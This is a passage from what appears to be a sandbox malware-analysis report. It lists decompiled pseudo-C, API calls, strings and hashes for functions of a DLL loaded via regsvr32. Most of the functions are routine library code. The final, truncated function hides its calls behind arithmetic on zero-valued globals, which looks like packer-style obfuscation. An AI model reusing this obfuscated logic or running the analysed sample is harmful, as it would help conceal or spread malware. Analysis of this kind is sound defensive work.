							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}

0x1000e154
0x1000e15f
0x1000e166
0x1000e168
0x1000e16f
0x1000e17d
0x1000e180
0x1000e2ad
0x1000e2b2
0x1000e2c0
0x1000e2c4
0x1000e2c5
0x1000e2ca
0x1000e2d0
0x1000e2e1
0x1000e2e6
0x1000e2f5
0x1000e2f8
0x1000e2fb
0x1000e302
0x1000e305
0x1000e30c
0x1000e311
0x1000e314
0x1000e321
0x1000e328
0x1000e32b
0x1000e332
0x1000e335
0x1000e342
0x1000e346
0x1000e365
0x1000e36b
0x1000e371
0x1000e37b
0x1000e381
0x1000e387
0x1000e390
0x1000e395
0x1000e39b
0x1000e3b7
0x1000e3ba
0x1000e3c0
0x1000e3c3
0x1000e3c6
0x1000e3c9
0x1000e3cf
0x00000000
0x1000e39d
0x1000e39d
0x1000e3a3
0x1000e3a3
0x00000000
0x1000e348
0x1000e348
0x1000e34e
0x1000e351
0x1000e351
0x1000e346
0x1000e2b4
0x1000e2b4
0x1000e2b4
0x1000e186
0x1000e186
0x1000e195
0x1000e19a
0x1000e1a0
0x1000e1a6
0x1000e1ae
0x1000e1af
0x1000e1b4
0x1000e1b9
0x1000e1bb
0x1000e1c1
0x1000e1c2
0x1000e1c7
0x1000e1cc
0x1000e1d2
0x1000e1d4
0x1000e1e8
0x1000e1eb
0x1000e1f1
0x1000e1f1
0x1000e1f4
0x1000e1fa
0x1000e1fa
0x1000e207
0x1000e215
0x1000e209
0x1000e20e
0x1000e20e
0x1000e217
0x1000e21a
0x1000e220
0x1000e223
0x1000e226
0x1000e22a
0x1000e231
0x1000e231
0x1000e240
0x1000e251
0x1000e242
0x1000e24a
0x1000e24a
0x1000e256
0x1000e25d
0x1000e268
0x1000e26e
0x1000e271
0x1000e277
0x1000e27b
0x1000e28d
0x1000e290
0x1000e29b
0x1000e2a3
0x1000e3d2
0x1000e3d5
0x1000e3d8
0x1000e3da
0x1000e3dc
0x1000e3de
0x1000e3e4
0x1000e3e9
0x1000e3ec
0x1000e3f9
0x1000e3ee
0x1000e3f2
0x1000e3f2
0x1000e3fb
0x1000e402
0x1000e405
0x1000e40c
0x1000e40f
0x1000e3dc
0x1000e414
0x1000e41c
0x1000e421
0x1000e428
0x1000e429
0x1000e432
0x1000e435
0x1000e43d
0x1000e43f
0x1000e444
0x1000e447
0x00000000
0x00000000
0x1000e44e
0x1000e45b
0x1000e469
0x1000e46f
0x00000000
0x00000000
0x1000e44b
0x1000e471
0x1000e473
0x1000e478
0x1000e47c
0x1000e482
0x1000e482
0x1000e485
0x1000e488
0x1000e488
0x1000e48b
0x00000000
0x1000e43a
0x00000000
0x1000e48b
0x1000e43d
0x1000e48d
0x1000e493
0x1000e493
0x1000e499
0x1000e499
0x1000e499
0x1000e1a0
0x1000e4a4
0x1000e4b5

APIs

__EH_prolog.LIBCMT ref: 1000E154
CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493

Strings

, xrefs: 1000E32B

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog
String ID:
API String ID: 1522537378-3916222277
Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10

Uniqueness

Uniqueness Score: -1.00%

Function 1000B6F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1000B6F5(void* __ecx) {
				intOrPtr* _t76;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t143;
				void* _t146;
				void* _t148;

				E10011BF0(0x1003ae9f, _t148);
				_t146 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t148 - 0x14);
				_push(0x10043128);
				 *((intOrPtr*)(_t148 - 0x14)) = 0;
				_push(_t76);
				 *((intOrPtr*)(_t148 - 0x18)) = 0;
				if( *((intOrPtr*)( *_t76))() >= 0) {
					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
					 *((intOrPtr*)(_t148 - 0x78)) = 0;
					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
					 *((intOrPtr*)(_t148 - 0x50)) = 0;
					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
					E10010592(_t148 - 0x28);
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *((intOrPtr*)(_t148 - 4)) = 0;
					 *(_t148 - 0x6c) = 0;
					 *((intOrPtr*)(_t148 - 0x10)) = 0;
					do {
						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x10040560)), _t148 - 0x28);
						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x10040564);
						}
						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
					_t101 =  *((intOrPtr*)(_t148 - 0x20));
					_push(_t148 - 0x60);
					_push(0x10043178);
					_push(_t101);
					if( *((intOrPtr*)( *_t101))() < 0) {
						 *((intOrPtr*)(_t148 - 0x60)) = 0;
					}
					_t103 =  *((intOrPtr*)(_t148 - 0x14));
					_push(_t148 - 0x40);
					_push(_t148 - 0x80);
					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
					_push(_t103);
					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
						 *((intOrPtr*)(_t148 - 0x18)) = 1;
					}
					_t105 =  *((intOrPtr*)(_t148 - 0x14));
					 *((intOrPtr*)( *_t105 + 8))(_t105);
					_t107 =  *((intOrPtr*)(_t148 - 0x60));
					if(_t107 != 0) {
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					__imp__#9(_t148 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
				return  *((intOrPtr*)(_t148 - 0x18));
			}

0x1000b6fa
0x1000b707
0x1000b709
0x1000b70c
0x1000b70f
0x1000b714
0x1000b719
0x1000b71a
0x1000b721
0x1000b72d
0x1000b736
0x1000b73f
0x1000b747
0x1000b74e
0x1000b751
0x1000b754
0x1000b757
0x1000b75a
0x1000b762
0x1000b765
0x1000b768
0x1000b76b
0x1000b76e
0x1000b780
0x1000b78a
0x1000b795
0x1000b795
0x1000b798
0x1000b79c
0x1000b7b0
0x1000b7c2
0x1000b7ca
0x1000b7dc
0x1000b7e4
0x1000b7f7
0x1000b7ff
0x1000b811
0x1000b819
0x1000b81f
0x1000b827
0x1000b828
0x1000b82d
0x1000b833
0x1000b835
0x1000b835
0x1000b838
0x1000b83e
0x1000b842
0x1000b843
0x1000b84c
0x1000b852
0x1000b857
0x1000b85d
0x1000b863
0x1000b866
0x1000b866
0x1000b86d
0x1000b873
0x1000b876
0x1000b87b
0x1000b880
0x1000b880
0x1000b887
0x1000b887
0x1000b895
0x1000b89d

APIs

__EH_prolog.LIBCMT ref: 1000B6FA
VariantClear.OLEAUT32(?), ref: 1000B887

Strings

@, xrefs: 1000B79C
@, xrefs: 1000B747

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClearH_prologVariant
String ID: @$@
API String ID: 1166855276-149943524
Opcode ID: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
Instruction ID: d7a2f0cc547cc5a266f2ab8e80424e9948fc94c4121f0c35bce9c1610e35d146
Opcode Fuzzy Hash: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
Instruction Fuzzy Hash: D551D4B1A002199FDB04CFA9C8889EEBBF9FF48314F14456EE506EB250E774A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 10033B73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
					L6:
					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0xffff2fff | 0x00002000;
						}
					}
					_t74 = E100339A3(_v8, _a16);
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *(_t74 + 0x34) == 0) {
						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
					}
					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E100203AD(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t76 =  *((intOrPtr*)(_t71 + 0x88));
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					goto L13;
				}
			}

0x10033b73
0x10033b76
0x10033b7a
0x10033b85
0x10033b88
0x10033be7
0x10033beb
0x10033bed
0x10033bf5
0x10033c04
0x10033c04
0x10033bf5
0x10033c19
0x10033c21
0x10033c29
0x10033c2e
0x10033c2e
0x10033c41
0x10033c4c
0x10033c57
0x10033c62
0x10033c76
0x10033c7a
0x10033c64
0x10033c68
0x10033c6d
0x10033c70
0x00000000
0x10033c70
0x10033c62
0x10033b8a
0x10033b92
0x00000000
0x10033bb3
0x10033bc9
0x10033bd1
0x10033bdc
0x00000000
0x10033bdc

APIs

GetParent.USER32(?), ref: 10033BB6

Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524

GetWindowLongA.USER32 ref: 10033C57
UpdateWindow.USER32(?), ref: 10033C70

Strings

P, xrefs: 10033BF1

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$LongParentUpdate
String ID: P
API String ID: 1906497633-3110715001
Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10034C5F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x1004c470; // 0xf256d946
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
					}
				}
				return E100117AE(_t13, _v8);
			}

0x10034c68
0x10034c6e
0x10034c81
0x10034c89
0x10034cd6
0x10034cd6
0x10034c8f
0x10034c8f
0x10034c90
0x10034c98
0x10034ca6
0x10034ca7
0x10034cb3
0x10034cb9
0x10034cba
0x10034cbb
0x00000000
0x10034cbd
0x10034cc2
0x10034ccf
0x10034ccf
0x10034cbb
0x10034ce2

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
PathFindExtensionA.SHLWAPI(?), ref: 10034C98
lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2

Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED

Strings

%s.dll, xrefs: 10034C9E

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
String ID: %s.dll
API String ID: 4178508759-3668843792
Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50

Uniqueness

Uniqueness Score: -1.00%

Function 100364C3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E100364C3() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x1004b8c8; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E10011C50( &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1004b8c8 = _t19;
				return _t19;
			}

0x100364c9
0x100364d1
0x10036530
0x10036530
0x100364ec
0x100364f0
0x100364f5
0x100364ff
0x1003650a
0x1003650b
0x10036516
0x10036523
0x10036523
0x10036516
0x10036525
0x00000000

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6

Strings

DllGetVersion, xrefs: 100364E0
COMCTL32.DLL, xrefs: 100364D5

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5

Uniqueness

Uniqueness Score: -1.00%

Function 10029A8E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t9;
				signed int _t17;

				_t9 =  *0x1004c470; // 0xf256d946
				_v8 = _t9;
				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					_t10 = 0;
				} else {
					GetClassNameA(_a4,  &_v20, 0xa);
					_t17 = lstrcmpiA( &_v20, "combobox");
					asm("sbb eax, eax");
					_t10 =  ~_t17 + 1;
				}
				return E100117AE(_t10, _v8);
			}

0x10029a98
0x10029a9d
0x10029aa0
0x10029ab5
0x10029ab9
0x10029ac2
0x10029ad1
0x10029ad9
0x10029adb
0x10029adb
0x10029ae5

APIs

GetWindowLongA.USER32 ref: 10029AA7
GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1

Strings

combobox, xrefs: 10029AC8

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91

Uniqueness

Uniqueness Score: -1.00%

Function 10019599 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E10019599(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x10042d28);
				E10012514(_t13, _t14, _t15);
				_t9 =  *0x1004f820;
				if(_t9 == 0) {
					if( *0x1004f3e0 == 1) {
						L4:
						_t9 = 0x10019589;
						 *0x1004f820 = 0x10019589;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x1004f820 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E1001254F(_t10);
			}

0x10019599
0x1001959b
0x100195a0
0x100195a5
0x100195ac
0x100195b5
0x100195db
0x100195db
0x100195e0
0x100195b7
0x100195bc
0x100195c4
0x00000000
0x100195c6
0x100195cc
0x100195d2
0x100195d9
0x00000000
0x00000000
0x100195d9
0x100195c4
0x100195b5
0x100195e5
0x100195f1
0x1001961a
0x10019623

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
kernel32.dll, xrefs: 100195B7

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 1646373207-3733552308
Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28

Uniqueness

Uniqueness Score: -1.00%

Function 10004DD0 Relevance: 6.2, APIs: 4, Instructions: 188
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E10004DD0() {
				void* _t51;
				signed int _t53;
				signed int _t59;
				signed int _t61;
				intOrPtr _t82;
				signed int _t96;
				signed int _t103;
				signed int _t111;
				signed int _t112;
				signed int _t120;
				signed int _t121;
				signed int _t125;
				signed int _t132;
				signed int _t139;
				signed int _t142;
				signed int _t151;
				intOrPtr _t157;
				signed int _t159;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t166;
				signed int _t173;
				signed int _t177;
				signed int _t189;
				void* _t195;
				void* _t196;

				_t164 =  *(_t195 + 0xc);
				if(_t164 != 0) {
					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
						_t132 =  *0x1004b0e0; // 0x0
						_t103 =  *0x1004b0dc; // 0x0
						_t151 =  *0x1004b0e8; // 0x0
						_t162 =  *0x1004b0e4; // 0x0
						_t82 =  *((intOrPtr*)(_t164 + 4));
						_t163 =  *0x1004b0ec; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
					}
					_t111 =  *0x1004b0dc; // 0x0
					_t53 =  *0x1004b0e8; // 0x0
					_t166 =  *0x1004b0ec; // 0x0
					_t10 = _t111 + 1; // 0x1
					_t112 =  *0x1004b0e0; // 0x0
					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
					_t196 = _t195 + 4;
					if( *((intOrPtr*)(_t164 + 8)) == 0) {
						L9:
						_t157 =  *((intOrPtr*)(_t164 + 4));
						if(_t157 != 0) {
							_t59 =  *0x1004b0dc; // 0x0
							_t120 =  *0x1004b0ec; // 0x0
							_t139 =  *0x1004b0e8; // 0x0
							_t121 =  *0x1004b0e0; // 0x0
							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
						}
						return HeapFree(GetProcessHeap(), 0, _t164);
					} else {
						_t125 =  *0x1004b0e0; // 0x0
						_t159 =  *0x1004b0ec; // 0x0
						_t173 =  *0x1004b0dc; // 0x0
